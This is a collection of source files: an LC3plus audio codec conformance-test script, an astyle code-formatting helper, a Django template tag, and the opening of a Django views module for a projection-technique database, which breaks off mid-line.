sys.exit('Unknown key \"{}\" in config'.format(key))\n globels['enabled_tests'] = split_list(parser['globals']['enabled_tests'])\n # trigger KeyError for required keys\n map(lambda key: globels[key], globals_required)\n # parse test sections\n for profile in globels['enabled_tests']:\n configs[profile] = {**globels, **DEFAULTS_TEST}\n for key in parser[profile]:\n try:\n val = strip_comment(parser[profile][key])\n if key in test_keys:\n configs[profile][key] = parse_bool(val)\n elif key == 'configs':\n lines = parser[profile][key].splitlines()\n configs[profile][key] = [parse_conf_line(l) for l in lines]\n elif key.endswith('_threshold') and key in DEFAULTS_TEST:\n configs[profile][key] = float(val)\n elif key.endswith('_metric') and key in DEFAULTS_TEST:\n if val not in ('rms', 'odg', 'mld', 'eng'):\n raise ValueError\n configs[profile][key] = val\n else:\n sys.exit('Unknown key \"{}\" in config'.format(key))\n except ValueError:\n sys.exit('Invalid value in config: {} = {}'.format(key, parser[profile][key]))\n except KeyError as e:\n sys.exit('Missing \"{}\" in config'.format(e.args[0]))\n except configparser.DuplicateOptionError as e:\n sys.exit('Duplicate key \"{}\" in config'.format(e.args[1]))\n\n return globels, configs\n\n\n# splits up files into channels, yields channel files\ndef split_channels(env, *files):\n channels = wav_info(files[0]).ch\n if channels == 1:\n yield files\n else:\n for ch in range(1, channels + 1):\n tmp_files = []\n for f in files:\n tmp = env.test_dir / uuid_file('split_', '.wav')\n sox(f, tmp, 'remix', ch)\n tmp_files.append(tmp)\n yield tmp_files\n\n\ndef run_rms(env, file1, file2, threshold):\n rms, diff, bits = -INF, 0, 24\n for split1, split2 in split_channels(env, file1, file2):\n tmp1 = env.test_dir / uuid_file('rms_', '.wav')\n tmp2 = env.test_dir / uuid_file('rms_', '.wav')\n copy_file(split1, tmp1)\n copy_file(split2, tmp2)\n align_files(tmp1, tmp2)\n out = call('tools/rms {} {} {}'.format(tmp1, tmp2, threshold))\n diff_samp = int(regex_search(r'different samples\\s+: (\\d+)', out))\n if diff_samp != 0:\n rms = max(rms, float(regex_search(r'Overall RMS value\\s+: (\\S+) dB ---', out)))\n diff = max(diff, float(regex_search(r'Maximum difference\\s+: (\\S+) ---', out)))\n bits = min(bits, int(regex_search(r'RMS criteria\\s+: (\\d+) bit', out)))\n return rms, diff, bits\n\n\ndef run_peaq(env, reference, test):\n odg = 5\n for split1, split2 in split_channels(env, reference, test):\n ref = env.test_dir / uuid_file('odg_', '.wav')\n tst = env.test_dir / uuid_file('odg_', '.wav')\n resample(split1, ref, 48000)\n resample(split2, tst, 48000)\n align_files(ref, tst)\n out = call(env.config['peaq_bin'].format(reference=ref, test=tst))\n odg = min(odg, float(regex_search(env.config['peaq_odg_regex'], out)))\n return odg\n\n\ndef run_mld(env, reference, test):\n mld = 0\n for split1, split2 in split_channels(env, reference, test):\n ref = env.test_dir / uuid_file('mld_', '.wav')\n tst = env.test_dir / uuid_file('mld_', '.wav')\n resample(split1, ref, 48000)\n resample(split2, tst, 48000)\n align_files(ref, tst)\n out = call('tools/mld -d {} {}'.format(ref, tst))\n mld = max(mld, float(regex_search(r'maximum loudness difference:\\s*(\\S+)', out)))\n return mld\n\n\n# calculate energy difference of two wavs\ndef energy_diff(env, file1, file2):\n logging.debug('energy_diff: %s %s', file1, file2)\n tmp1 = str(env.test_dir / uuid_file('eng_', '.wav'))\n tmp2 = str(env.test_dir / uuid_file('eng_', '.wav'))\n copy_file(file1, tmp1)\n copy_file(file2, tmp2)\n align_files(tmp1, tmp2)\n with wave.open(tmp1, 'rb') as ref_wf, wave.open(tmp2, 'rb') as tst_wf:\n bytes_ref = ref_wf.readframes(ref_wf.getnframes())\n bytes_tst = tst_wf.readframes(tst_wf.getnframes())\n ref = byte_to_float(bytes_ref, ref_wf.getnframes(), ref_wf.getnchannels())\n tst = byte_to_float(bytes_tst, tst_wf.getnframes(), tst_wf.getnchannels())\n eng_diff = sum(numpy.square(numpy.subtract(ref, tst)))\n eng_diff = math.log10(eng_diff) if eng_diff != 0 else -INF\n return eng_diff\n\n\n# compare output wavs by metric rms, odg, mld, eng\ndef compare_wav(env, mode, infile, file_ref, file_tst):\n mkey = '{}_{}_metric'.format(env.test, mode)\n metric = env.config[mkey]\n tkey = '{}_{}_{}_threshold'.format(env.test, mode, metric)\n thresh = env.config[tkey]\n\n if metric == 'rms':\n rms, diff, bits = run_rms(env, file_ref, file_tst, thresh)\n rms_thr = 20 * math.log10(2 ** (-thresh + 1) / 12 ** 0.5)\n diff_thr = 1 / 2 ** (thresh - 3)\n ok_rms = rms <= rms_thr\n ok_diff = diff <= diff_thr\n ok_bits = bits >= thresh\n ok = ok_rms and ok_diff\n values = [(diff, ('fail', 'pass')[ok_diff], diff_thr),\n (rms, ('fail', 'pass')[ok_rms], rms_thr),\n (bits, ('warn', 'none')[ok_bits], thresh)]\n if metric == 'odg':\n odg_ref = run_peaq(env, infile, file_ref)\n odg_tst = run_peaq(env, infile, file_tst)\n odg_diff = abs(odg_ref - odg_tst)\n ok = odg_diff <= thresh\n values = [(odg_ref, '', None),\n (odg_diff, ('fail', 'pass')[ok], thresh)]\n if metric == 'mld':\n mld = run_mld(env, file_ref, file_tst)\n ok = mld <= thresh\n values = [(mld, ('fail', 'pass')[ok], thresh)]\n if metric == 'eng':\n d_eng = energy_diff(env, file_ref, file_tst)\n ok = d_eng <= thresh\n values = [(d_eng, ('fail', 'pass')[ok], thresh)]\n\n return ok, values\n\n\n# compare outout files of ep debug flag\ndef compare_errors(env, file_ref, file_tst):\n ok_all, values = True, []\n for ext in ['.bfi', '.epmr', '.error_report']:\n ok = compare_bin(str(file_ref) + ext, str(file_tst) + ext)\n values += [(('bad', 'ok')[ok], ('fail', 'pass')[ok], None)]\n return ok_all, values\n\n\n# ensure inputs exist and nothig is overwritten we're not overwriting anythong\ndef check_io_files(input, output):\n if not is_file(input):\n raise FileNotFoundError(input)\n if is_file(output):\n raise FileExistsError(output)\n\n\ndef encode_reference(env, input, output, frame_size, bitrate, bandwidth=None, ep_mode=0):\n check_io_files(input, output)\n cmd = env.config['reference_encoder']\n opt = []\n if bandwidth:\n opt += ['-bandwidth', bandwidth]\n if ep_mode:\n opt += ['-epmode', ep_mode]\n options = ' '.join(map(str, opt))\n call(cmd.format(input=input, output=output, frame_size=frame_size, bitrate=bitrate, options=options))\n\n\ndef encode_test(env, input, output, frame_size, bitrate, bandwidth=None, ep_mode=0):\n check_io_files(input, output)\n cmd = env.config['encoder']\n opt = []\n if bandwidth:\n opt += [env.config['option_bandwidth'].format(arg=bandwidth)]\n if ep_mode:\n opt += [env.config['option_ep_mode'].format(arg=ep_mode)]\n options = ' '.join(opt)\n call(cmd.format(input=input, output=output, frame_size=frame_size, bitrate=bitrate, options=options))\n\n\ndef decode_reference(env, input, output, error_file=None):\n check_io_files(input, output)\n cmd = env.config['reference_decoder']\n opt = []\n if error_file:\n opt += ['-ep_dbg', error_file]\n options = ' '.join(map(str, opt))\n call(cmd.format(input=input, output=output, options=options))\n\n\ndef decode_test(env, input, output, error_file=None):\n check_io_files(input, output)\n cmd = env.config['decoder']\n opt = []\n if error_file:\n opt += [env.config['option_ep_debug'].format(arg=error_file)]\n options = ' '.join(map(str, opt))\n call(cmd.format(input=input, output=output, options=options))\n\n\ndef apply_error_pattern(env, input, output, mode, pattern):\n assert mode in ('fer', 'ber', 'flip')\n check_io_files(input, output)\n if mode == 'fer':\n cmd = 'tools/eid-xor.exe -vbr -bs g192 -ep byte -fer {} {} {}'\n call(cmd.format(input, pattern, output))\n if mode == 'ber':\n cmd = 'tools/eid-xor.exe -vbr -bs g192 -ep byte -ber {} {} {}'\n call(cmd.format(input, pattern, output))\n if mode == 'flip':\n cmd = 'tools/flipG192 {} {} {} {} 1911 0'\n flips, frames = pattern\n call(cmd.format(input, output, flips, frames))\n # copy the config file of g192 bitstreams\n if is_file(str(input) + '.cfg'):\n copy_file(str(input) + '.cfg', str(output) + '.cfg')\n\n\n# create file names for test\ndef make_files(env, files, *args):\n protoyp = '_'.join(map(lstr, args)) + '_'\n return tuple(env.test_dir / (protoyp + f) for f in files)\n\n\n# permutate test configs\ndef sqam_configs(config, items, ch=1, lp20=True, modes=None):\n for mode, fs, sr, brs in config['configs']:\n if modes and mode not in modes:\n continue\n for item, br in itertools.product(items, brs):\n suffix = '_lp20' if lp20 and sr in (44100, 48000) else ''\n infile = ITEM_DIR / '{}_{}_{}ch{}.wav'.format(item, sr, ch, suffix)\n yield mode, item, fs, sr, br, infile\n\n\n# apply test func to list of tests, multithreadded\ndef test_executor(env, func, tests):\n ex = Executor(env.workers)\n return list(ex.map(lambda args: func(*args), tests))\n\n\n# process a single test item\n# performs encoding, erroring, decoding and evaluation\n# returns tuble of bool, list (pass condition, metric values)\n# mode: encode/decode/encdec, fs: frame size, sr: sampling rate, br: bitrate\ndef process_item(env, mode, item, fs, sr, br, infile, bandwidth=None, ep_mode=0, error_mode=None, error_pattern=None):\n bw_name = 'swf' if is_file(bandwidth) else bandwidth\n ep_name = '1-4' if is_file(ep_mode) else ep_mode\n fmt = ' {} {:20} {:3g} ms {:5} Hz {:>6} bit/s ep:{}'\n print(fmt.format(mode, item, fs, sr, lstr(br), ep_name))\n\n file_names = ['r.g192', 't.g192', 're.g192', 'te.g192', 'r.wav', 't.wav', 'rd', 'td']\n file_tuple = make_files(env, file_names, mode, infile.stem, fs, sr, br, bw_name, ep_name)\n ref_bin, tst_bin, ref_err, tst_err, ref_wav, tst_wav, ref_dbg, tst_dbg = file_tuple\n # evaluate channel coder output only for decode_ep_* tests\n if not (env.test.startswith('ep_') and mode == 'decode'):\n err_ok, err_val, ref_dbg, tst_dbg = True, [], None, None\n\n try:\n # generate bitratre switching file if needed\n if type(br) in (list, tuple):\n br = generate_switching_file(env, *br)\n # encode\n encode_reference(env, infile, ref_bin, fs, br, bandwidth=bandwidth, ep_mode=ep_mode)\n if mode in ('encode', 'encdec'):\n encode_test(env, infile, tst_bin, fs, br, bandwidth=bandwidth, ep_mode=ep_mode)\n # apply errors\n if error_mode:\n apply_error_pattern(env, ref_bin, ref_err, error_mode, error_pattern)\n ref_bin = ref_err\n if mode in ('encode', 'encdec'):\n apply_error_pattern(env, tst_bin, tst_err, error_mode, error_pattern)\n tst_bin = tst_err\n # decode\n decode_reference(env, ref_bin, ref_wav, error_file=ref_dbg)\n if mode == 'encode':\n decode_reference(env, tst_bin, tst_wav, error_file=tst_dbg)\n if mode == 'encdec':\n decode_test(env, tst_bin, tst_wav, error_file=tst_dbg)\n if mode == 'decode':\n decode_test(env, ref_bin, tst_wav, error_file=tst_dbg)\n # compare outputs\n ok, val = compare_wav(env, mode, infile, ref_wav, tst_wav)\n if ref_dbg and tst_dbg:\n err_ok, err_val = compare_errors(env, ref_dbg, tst_dbg)\n return ok and err_ok, err_val + val\n\n except (OSError, FileNotFoundError, FileExistsError, KeyError) as e:\n logging.error('process_item: %s: %s', type(e).__name__, str(e))\n return False, []\n\n\ndef test_sqam(env):\n print('Testing SQAM ...')\n def func(mode, item, fs, sr, br, infile):\n ok, values = process_item(env, mode, item, fs, sr, br, infile)\n return [ok, mode, item, fs, sr, br] + values\n\n tests = sqam_configs(env.config, ITEMS)\n return test_executor(env, func, tests)\n\n\ndef test_band_limiting(env):\n print('Testing band limitation ...')\n def func(mode, item, fs, sr, br, bw):\n infile = ITEM_DIR / '{}_{}_1ch_bw{}.wav'.format(item, sr, bw)\n ok, values = process_item(env, mode, item, fs, sr, br, infile)\n return [ok, mode, item, fs, sr, br, bw] + values\n\n tests = set()\n for mode, fs, sr, _ in env.config['configs']:\n if sr >= 16000:\n bw_limits, frame_bytes = BAND_LIMITS[sr]\n br = get_bitrate(frame_bytes, fs)\n for bw in bw_limits:\n tests.add((mode, ITEM_BAND_LIMIT, fs, sr, br, bw))\n return test_executor(env, func, list(tests))\n\n\ndef test_low_pass(env):\n print('Testing low pass ...')\n def func(mode, item, fs, sr, br, infile):\n ok, values = process_item(env, mode, item, fs, sr, br, infile)\n return [ok, mode, item, fs, sr, br] + values\n\n items = [ITEM_LOW_PASS]\n modes = ['encode', 'encdec']\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, items , modes=modes, lp20=False):\n if sr >= 44100:\n tests.append((mode, item, fs, sr, br, infile))\n return test_executor(env, func, tests)\n\n\ndef test_bitrate_switching(env):\n print('Testing bitrate switching ...')\n def func(mode, item, fs, sr, bitrates):\n br = (int(160000 / fs), max(bitrates))\n infile = ITEM_DIR / '{}_{}_1ch.wav'.format(item, sr)\n ok, values = process_item(env, mode, item, fs, sr, br, infile)\n return [ok, mode, item, fs, sr, br] + values\n\n tests = []\n for mode, fs, sr, bitrates in env.config['configs']:\n for item in ITEMS:\n tests.append((mode, item, fs, sr, bitrates))\n return test_executor(env, func, tests)\n\n\ndef test_bandwidth_switching(env):\n print('Testing bandwidth switching ...')\n def func(mode, item, fs, sr, br, infile):\n bwf = generate_switching_file(env, *BAND_WIDTHS[sr])\n ok, values = process_item(env, mode, item, fs, sr, br, infile, bwf)\n return [ok, mode, item, fs, sr, br] + values\n\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, ITEMS):\n if sr >= 16000:\n tests.append((mode, item, fs, sr, br, infile))\n return test_executor(env, func, tests)\n\n\ndef test_plc(env):\n print('Testing packet loss concealment ...')\n def func(mode, item, fs, sr, br, infile):\n pattern = 'etc/plc_fer_eid.dat'\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, 0, 'fer', pattern)\n return [ok, mode, item, fs, sr, br] + values\n\n tests = sqam_configs(env.config, ITEMS_PLC, modes=['decode'])\n return test_executor(env, func, tests)\n\n\ndef test_pc(env):\n print('Testing partial concealment ...')\n def func(mode, item, fs, sr, br, infile):\n pattern = 'etc/pc_ber_3percent.dat'\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, 4, 'ber', pattern)\n return [ok, mode, item, fs, sr, br] + values\n\n tests = sqam_configs(env.config, ITEMS_PLC, modes=['decode'])\n return test_executor(env, func, tests)\n\n\ndef test_ep_correctable(env):\n print('Testing channel coder for correctable frames ...')\n def func(mode, item, fs, sr, br, infile, ep_mode):\n pattern = (ep_mode - 1, 50)\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, ep_mode, 'flip', pattern)\n return [ok, mode, item, fs, sr, br, ep_mode] + values\n\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, ITEMS):\n for ep_mode in [1, 2, 3, 4]:\n tests.append((mode, item, fs, sr, br, infile, ep_mode))\n return test_executor(env, func, tests)\n\n\ndef test_ep_non_correctable(env):\n print('Testing channel coder for non-correctable frames ...')\n def func(mode, item, fs, sr, br, infile, ep_mode):\n pattern = (int(br * ep_mode * fs / 24000), 50)\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, ep_mode, 'flip', pattern)\n return [ok, mode, item, fs, sr, br, ep_mode] + values\n\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, ITEMS):\n for ep_mode in [1, 2, 3, 4]:\n tests.append((mode, item, fs, sr, br, infile, ep_mode))\n return test_executor(env, func, tests)\n\n\ndef test_ep_mode_switching(env):\n print('Testing ep-mode switching ...')\n ep_mode = generate_switching_file(env, 100, 200, 300, 400)\n def func(mode, item, fs, sr, br, infile):\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, ep_mode, None, None)\n return [ok, mode, item, fs, sr, br, '1-4'] + values\n\n tests = sqam_configs(env.config, ITEMS)\n return test_executor(env, func, tests)\n\n\ndef test_ep_combined(env):\n print('Testing combined channel coder for correctable frames ...')\n def func(mode, item, fs, sr, br, infile, ep_mode):\n pattern = (ep_mode - 1, 50)\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, ep_mode, 'flip', pattern)\n return [ok, mode, item, fs, sr, br, ep_mode] + values\n\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, ITEMS, ch=2):\n if br <= 128000:\n for ep_mode in [1, 2, 3, 4]:\n tests.append((mode, item, fs, sr, br, infile, ep_mode))\n\n return test_executor(env, func, tests)\n\n\ndef test_ep_combined_nc(env):\n print('Testing combined channel coder for non-correctable frames ...')\n def func(mode, item, fs, sr, br, infile, ep_mode):\n pattern = (int(br * ep_mode * fs / 24000), 50)\n ok, values = process_item(env, mode, item, fs, sr, br, infile, None, ep_mode, 'flip', pattern)\n return [ok, mode, item, fs, sr, br, ep_mode] + values\n\n tests = []\n for mode, item, fs, sr, br, infile in sqam_configs(env.config, ITEMS, ch=2):\n if br <= 128000:\n for ep_mode in [1, 2, 3, 4]:\n tests.append((mode, item, fs, sr, br, infile, ep_mode))\n return test_executor(env, func, tests)\n\n\ndef pass_ratio(results):\n num_passed = sum(ok for ok, *_ in results)\n return num_passed / len(results) if results else 1.0\n\n\ndef profile_passed(all_results):\n flat_results = itertools.chain(*all_results.values())\n return all(ok for ok, *_ in flat_results)\n\n\ndef gen_td(value):\n if type(value) in (tuple, list) and len(value) == 3:\n value, clazz, thresh = value\n clazz = ' class={}'.format(clazz) if clazz else ''\n thresh = ' ({})'.format(fstr(thresh)) if thresh != None else ''\n return '{}{}'.format(clazz, fstr(value), thresh)\n else:\n return '{}'.format(lstr(value))\n\n\ndef gen_table(test, mode, config, results):\n mkey = '{}_{}_metric'.format(test, mode)\n metric = config[mkey]\n header = HEADER_ALL.copy()\n if test == 'band_limiting':\n header += HEADER_BL\n if test.startswith('ep_'):\n header += HEADER_EP\n if mode == 'decode':\n header += HEADER_EPD\n header += HEADER_METRIC[metric]\n buf = '\\n'\n buf += ''.join(''.format(x) for x in header)\n buf += '\\n'\n for values in results:\n buf += ''\n buf += ''.join(map(gen_td, values[1:]))\n buf += '\\n'\n return buf + '
    {}
    \\n'\n\n\ndef gen_div(test, config, results):\n percent = round(100 * pass_ratio(results))\n buf = HTML_DIV.format(label=LABEL[test], percent=percent)\n for mode in TEST_MODES:\n mode_results = [r for r in results if r[1] == mode]\n if mode_results:\n buf += gen_table(test, mode, config, mode_results)\n return buf + '
    \\n'\n\n\ndef save_html(profile, config, all_results, html_file):\n ok = profile_passed(all_results)\n state = ('failed', 'passed')[ok]\n buf = HTML_HEAD.format(title=profile, style=STYLE, state=state)\n for test in TESTS:\n if test in all_results:\n buf += gen_div(test, config, all_results[test])\n buf += '\\n'\n\n with open(html_file, 'w') as f:\n f.write(buf)\n\n\ndef main(args):\n args.workers = min(max(args.workers, 1), os.cpu_count())\n time_stamp = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M')\n log_file = 'lc3_conformance_{}.log'.format(time_stamp)\n log_handlers = [logging.FileHandler(log_file)]\n if args.verbose:\n log_handlers += [logging.StreamHandler(sys.stdout)]\n logging.basicConfig(level=logging.DEBUG, handlers=log_handlers)\n work_dir = makedirs(pathlib.Path('lc3_conformance_' + time_stamp))\n\n try:\n all_passed = True\n globels, configs = parse_config(args.config)\n profiles = globels['enabled_tests']\n check_system(args, globels)\n build_tools()\n if not args.system_sox:\n download_sox()\n prepare_items(args.workers)\n\n for profile in profiles:\n print('Running tests for \"{}\" ...'.format(profile))\n config = configs[profile]\n all_results = {}\n for test in TESTS:\n test_test = 'test_' + test\n if config[test_test]:\n test_dir = makedirs(work_dir / profile / test)\n test_env = TestEnv(profile, test, config, test_dir, args.workers)\n test_func = globals()[test_test]\n test_result = test_func(test_env)\n if not test_result:\n print('{} in \"{}\" is enabled with no suitable configuration!'.format(test, profile))\n all_results[test] = test_result\n if not args.keep_files:\n removedir(work_dir / profile / test)\n\n if all_results:\n all_passed = all_passed and profile_passed(all_results)\n html_file = '{}_{}.html'.format(profile, time_stamp)\n print('Saving results ...')\n save_html(profile, config, all_results, html_file)\n else:\n print('No tests in \"{}\" were enabled!'.format(profile))\n\n print('\\nLogfile:', log_file)\n print('Results:', ' \\n'.join('%s_%s.html' % (p, time_stamp) for p in profiles))\n print('\\nConformance test', 'passed.' if all_passed else 'failed!', '\\n')\n sys.exit(0 if all_passed else 1)\n except KeyboardInterrupt:\n print('\\rExiting. Please wait while workers shut down ...')\n finally:\n if not args.keep_files:\n removedir(work_dir)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='LC3plus conformance tool - checks if your version of the LC3plus cod'\n 'ec is conform to the reference provided by Fraunhofer & Ericsson.')\n parser.add_argument('-keep', action='store_true', dest='keep_files', help=\"Don't delete workdir at end of test\")\n parser.add_argument('-system_sox', action='store_true', help='Use system sox')\n parser.add_argument('-v', action='store_true', dest='verbose', help='Activate verbose output')\n parser.add_argument('-w', dest='workers', type=int, default=os.cpu_count(), help='Number of worker threads')\n parser.add_argument('config', help='Conformance config file')\n args = parser.parse_args()\n\n if args.system_sox:\n SOX_EXE = 'sox'\n\n main(args)\n","repo_name":"marzzzello/LC3plus","sub_path":"conformance/lc3_conformance.py","file_name":"lc3_conformance.py","file_ext":"py","file_size_in_byte":41157,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"34"} +{"seq_id":"19180451259","text":"import os\nimport sys\nimport subprocess\nfrom pathlib import Path\nfrom re import match\nfrom shutil import which\n\n# ANSI esacpe sequence set in order to print colored text\n# [ref](https://stackoverflow.com/a/287944)\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n# Get file path\ndir = Path(os.path.dirname(__file__))\n\n# astyle formatter configuration paths\nastyle_config = Path('astylerc')\nastyle_path = Path.joinpath(dir, Path('.vscode'))\n\n# Find a file (`filename`) from given the search path (`search_path`)\ndef find_files(filename, search_path):\n result = []\n for root, dir, files in os.walk(search_path):\n if filename in files:\n result.append(os.path.join(root, filename))\n return result\n\n# Check `astyle` command is exist\nif which('astyle') is None:\n sys.exit(bcolors.FAIL + '\\'astyle\\' command does not exist.' + bcolors.ENDC)\n\n# Check the astyle option file (configraution file) is exist\nif not find_files(str(astyle_config), str(astyle_path)):\n sys.exit(bcolors.FAIL + 'Cannot find %s file in \\'%s\\'.' % (astyle_config, astyle_path) + bcolors.ENDC)\n\n# Apply to every each *.c and *.h files given the format option except the files that in the Git related folders (submodules, etc.)\ndir_list = list(filter(lambda name: not name.startswith('.'), os.listdir(dir)))\nfor item in dir_list:\n dir_absolute_path = Path.joinpath(dir, Path(item))\n if os.path.isdir(dir_absolute_path) and not find_files(str('.git'), str(dir_absolute_path)):\n subprocess.run(['astyle',\n '--options=%s' % str(Path.joinpath(astyle_path, astyle_config)),\n '--recursive',\n str(Path.joinpath(dir_absolute_path, Path('*.c,*.h')))])\n\n# Apply to every each *.c and *.h files from the root of the project folder\nprint('------------------------------------------------------------')\nprint('Finding *.c and *.h files from the root of \\'%s\\'' % (dir))\nprint('------------------------------------------------------------')\nfiles_in_root_dir = list(filter(lambda v: match('.*\\.[ch]', v), dir_list))\n\nif not files_in_root_dir:\n print(\"Nothing to change.\")\nelse:\n for item in files_in_root_dir:\n subprocess.run(['astyle',\n '--options=%s' % str(Path.joinpath(astyle_path, astyle_config)),\n str(Path.joinpath(dir, Path(item)))])\n\n# Print a finish message\nprint(bcolors.OKGREEN + \"\\nFormat completed.\" + bcolors.ENDC)\n","repo_name":"NyankoTear/c-formatter","sub_path":"format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13818676056","text":"from django import template\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef active_if_contains(context, url_part):\n request = context['request']\n if url_part in request.path:\n return \"active\"\n else:\n return \"\"\n","repo_name":"UrLab/incubator","sub_path":"incubator/templatetags/activelink.py","file_name":"activelink.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"41802813174","text":"from django.shortcuts import render\nfrom django.forms.models import model_to_dict\nfrom .models import *\nfrom django.db.models import Q, Count\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Allow to filter horizontal ie search bar for references in admin\n# Allow to clear options for range section and also for tasks input/output space\n# The single_select option only needs to be there when All is selected. For any, multi-select should be allowed.\n# Task when displaying results in the advanced section, should the children be left out?\n# When reloading the page after a query, don't reset the state of the buttons. I think this should be taken care of\n# by an AJAX request though.\n\n# Have a clear all selected options button. Just have a div within which all the options are present.\n# Find all elements that are buttons within that div and reset their state.\n# Tables\n# QM - Done both Basic and Advanced\n# Langs - Both MDPs and Langs done\n# Task - Done both Basic and Advanced\n# MDP - Done but have to make get changes to basic\n# Enrichment - Not started\n\n# Things to check with Dr. Michael\n# What to call the QM_Parameter Options\n# How to introduce the child tasks section etc in the Task Table\n\n# Create your views here.\n# https://stackoverflow.com/questions/52428124/django-manytomany-field-returns-none-but-it-has-related-records\n# https://stackoverflow.com/questions/48176774/django-path-doesnt-find-the-right-primary-key-in-url-path\n# https://stackoverflow.com/questions/21925671/convert-django-model-object-to-dict-with-all-of-the-fields-intact\n# https://stackoverflow.com/questions/14456503/how-to-get-a-particular-attribute-from-queryset-in-django-in-view\n# https://stackoverflow.com/questions/4424435/how-to-convert-a-django-queryset-to-a-list Check itertools here\n# Retrieving many-to-many field information from a returned queryset\n# https://stackoverflow.com/questions/52428124/django-manytomany-field-returns-none-but-it-has-related-records\n# Checking the size of a passed parameter from within the template. If the size is 0 then we don't have to render the\n# element. This can prevent subsection headings from being rednered even when there is no information to be displayed\n# within the subsection.\n# https://stackoverflow.com/questions/902034/how-can-i-check-the-size-of-a-collection-within-a-django-template\n# Checking variable values passed back using the url\n# https://stackoverflow.com/questions/150505/capturing-url-parameters-in-request-get\n# Q objects\n# https://stackoverflow.com/questions/20222457/django-building-a-queryset-with-q-objects\n# https://stackoverflow.com/questions/8144582/django-how-do-i-use-a-string-as-the-keyword-in-a-q-statement\n# Viewing raw SQL Queries\n# https://stackoverflow.com/questions/971667/how-to-view-corresponding-sql-query-of-the-django-orms-queryset\n# Setting up the django debug toolbar https://www.youtube.com/watch?v=XdArRS9kP6U\n# https://stackoverflow.com/questions/971667/how-to-view-corresponding-sql-query-of-the-django-orms-queryset\n\n# https://stackoverflow.com/questions/14327036/count-vs-len-on-a-django-queryset\n# https://stackoverflow.com/questions/27213752/collecting-staticfiles-throws-improperlyconfigured\n# Django modifying admin templates\n# https://stackoverflow.com/questions/398163/ordering-admin-modeladmin-objects\n# https://books.agiliq.com/projects/django-admin-cookbook/en/latest/set_ordering.html\n# https://stackoverflow.com/questions/12308530/how-to-catch-specific-error-in-any-template-in-django\n# https://stackoverflow.com/questions/20952156/how-to-pass-javascript-variable-to-django-custom-filter\n# https://stackoverflow.com/questions/47648886/difference-between-strdict-and-json-dumpsdict\n# https://stackoverflow.com/questions/1413122/is-autoescape-off-in-django-safe\n# https://stackoverflow.com/questions/45163299/django-group-by-field-value\n# https://stackoverflow.com/questions/12809416/django-static-files-404\n# https://docs.djangoproject.com/en/2.0/ref/models/instances/#django.db.models.Model.get_FOO_display\n# https://www.revsys.com/tidbits/tips-using-djangos-manytomanyfield/\n\ndata_type_fieldnames = ['dissimilarity_id', 'ordinal_id', 'cartesian_id', 'ne_structures_id', 'categorical_id']\ntax_fieldnames = ['linearity_id', 'supervision_id', 'multi_level_id', 'locality_id', 'steerability_id',\n 'stability_id', 'out_of_core_data_id']\nqm_fieldnames = {('Span', 'span'): ['local', 'glob'], ('Distortion Type', 'dist'): ['dissimilarity', 'correlation',\n 'probability', 'rank', 'geometric',\n 'set_difference', 'homology'],\n ('Output', 'op'): ['rangee', 'best']}\ntask_fieldnames = [['Task Type', 'task_type'], ['Input Space', 'input_space'], ['Output Space', 'output_space'],\n ['Actor', 'actor'], ['Target Space', 'ts']\n ]\nparameter_text = [['Local', 'Global'], ['Dissimilarity', 'Correlation', 'Probability', 'Rank', 'Geometric',\n 'Set Difference', 'Homology'],\n ['Range', 'Best']]\nfilter_options = ['All', 'Any', 'Inc', 'Exc']\nprojtech_fieldname = ['mdp_fullname', 'mdp_name']\ntxtdisp_data = ['Dissimilarity', 'Ordinal', 'Cartesian', 'Neighbouring Structures', 'Categorical']\ntxtdisp_tax = [((i.split('_id')[0]).replace('_', ' ')).title() for i in tax_fieldnames]\n# A list of sublists where sublist[0] = Parameter Display Name\n# sublist[1] = Parameter Query Name\n# sublist[2] = Parameter used to query returned object\ntask_fields = [\n ['Task Type', 'task_type', 'type_name', 'ttype'],\n ['Input Space', 'input_space', 'mathjaxeqn', 'inpsp'], ['Output Space', 'output_space', 'mathjaxeqn', 'outsp'],\n ['Actor', 'actor', None, 'act'], ['Target Space', 'ts', 'mathjaxeqn', 'ts'],\n ['MDP Property', 'task_property', 'mdp_property', 'prop'],\n ['Best Matching MDPs', 'best_mdp_list', 'best_matching_mdp', 'bestmatch'],\n # ['Parent Task', 'parent_id', 'task_name'],\n # ['Reference', 'reference_list', None]\n]\n\n\ndef getvalues(queryset, fieldnames):\n data = []\n for i in range(len(fieldnames)):\n data.append(getattr(queryset, fieldnames[i]))\n return data\n\n\ndef mdpbasic(request, pk=None):\n # This data will be for the mdp list. I am not going to be displaying the full name but only the short form since\n # otherwise it doesn't look very appealing visually. However, since the user is allowed to search by the projection\n # name, I also want them to be able to search by the full name. Thus, I put that full name within a span element and\n # set it's display attribute to none. So, it won't be visible but the filter can still see the value.\n data = MDP.objects.values('mdp_name', 'mdp_fullname', 'mdp_id').order_by('mdp_id')\n # Will contain a dictionary of the handling ability id and the text mapped to that id. So that I don't have to\n # make queries for every single attribute in the database whenever i need to fetch the text.\n handling_text = {}\n for c in HandlingAbility.objects.all():\n handling_text[c.id] = 